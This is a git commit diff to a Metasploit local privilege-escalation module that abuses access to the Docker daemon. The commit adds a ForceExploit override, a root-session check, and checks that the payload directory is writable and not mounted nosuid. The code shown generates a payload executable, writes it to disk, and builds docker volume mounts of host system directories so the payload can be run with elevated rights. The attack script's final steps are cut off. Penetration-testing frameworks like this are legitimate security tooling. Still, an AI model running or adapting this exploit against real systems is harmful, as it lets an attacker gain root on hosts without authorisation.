Add check for writable and nosuid WritableDir
parent
d18c6bd158
commit
20fd6b6134
|
@ -29,12 +29,18 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
}
|
||||
))
|
||||
register_advanced_options([
|
||||
OptBool.new('ForceExploit', [false, 'Override check result', false]),
|
||||
OptString.new("WritableDir", [true, "A directory where we can write files", "/tmp"])
|
||||
])
|
||||
end
|
||||
|
||||
def base_dir
|
||||
datastore['WritableDir'].to_s
|
||||
end
|
||||
|
||||
def check
|
||||
if cmd_exec('docker ps && echo true') =~ /true$/
|
||||
print_good("Docker daemon is accessible.")
|
||||
Exploit::CheckCode::Vulnerable
|
||||
else
|
||||
print_error("Failed to access Docker daemon.")
|
||||
|
@ -43,8 +49,29 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def exploit
|
||||
unless check == CheckCode::Vulnerable
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.'
|
||||
end
|
||||
print_warning 'Target does not appear to be vulnerable'
|
||||
end
|
||||
|
||||
if is_root?
|
||||
unless datastore['ForceExploit']
|
||||
fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
|
||||
end
|
||||
end
|
||||
|
||||
unless writable? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is not writable"
|
||||
end
|
||||
|
||||
if nosuid? base_dir
|
||||
fail_with Failure::BadConfig, "#{base_dir} is mounted nosuid"
|
||||
end
|
||||
|
||||
pl = generate_payload_exe
|
||||
exe_path = "#{datastore['WritableDir']}/#{rand_text_alpha(6 + rand(5))}"
|
||||
exe_path = "#{base_dir}/#{rand_text_alpha(6..11)}"
|
||||
print_status("Writing payload executable to '#{exe_path}'")
|
||||
|
||||
write_file(exe_path, pl)
|
||||
|
@ -59,7 +86,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
end
|
||||
|
||||
def shell_script(exploit_path)
|
||||
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [datastore['WritableDir']]
|
||||
deps = %w(/bin /lib /lib64 /etc /usr /opt) + [base_dir]
|
||||
dep_options = deps.uniq.map { |dep| "-v #{dep}:#{dep}" }.join(" ")
|
||||
|
||||
%Q{
|
||||
|
|
Loading…
Reference in New Issue